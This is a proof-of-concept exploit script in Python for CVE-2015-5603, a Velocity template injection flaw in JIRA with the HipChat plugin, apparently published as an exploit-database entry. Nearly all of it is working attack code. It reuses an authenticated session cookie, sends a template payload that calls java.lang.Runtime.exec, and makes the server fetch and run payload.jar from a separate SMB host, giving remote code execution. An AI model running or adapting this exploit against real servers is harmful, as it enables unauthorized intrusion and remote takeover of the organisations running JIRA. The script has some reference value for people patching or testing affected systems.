############################################################################ # JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability # Date: 2015-08-26 # CVE ID: CVE-2015-5603 # Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html # # Product: JIRA and the HipChat for JIRA plugin. # Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0 # Affected JIRA product versions: 6.3.5 <= version < 6.4.11 # # Discovered internally by Atlassian (vendor) # Proof of concept script by Chris Wood <chris@invivid.com> # # Tested against JIRA 6.3.4a with HipChat 6.29.2 on Windows 7 x64 # Allows any authenticated JIRA user to execute code running as Tomcat identity ############################################################################ import urllib2 import json # cookie of any authenticated session (ex. jira-user) JSESSIONID = '541631B0D72EF1C71E932953F4760A70' # jira server RHOST = 'http://192.168.2.15:8080' # samba public share, read/write to anonymous users CMD = ' java -jar \\192.168.2.234\public\payload.jar ' data = { 'message': ' $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('' + CMD + '').waitFor() ' } opener = urllib2.build_opener() opener.addheaders.append(('Cookie', 'JSESSIONID=' + JSESSIONID)) urllib2.install_opener(opener) req = urllib2.Request(RHOST + '/rest/hipchat/integrations/1.0/message/render/') req.add_header('Content-Type', 'application/json') response = urllib2.urlopen(req, json.dumps(data)) print('##################################') print('######### CVE-2015-5603 ##########') print('##################################') print(response.read())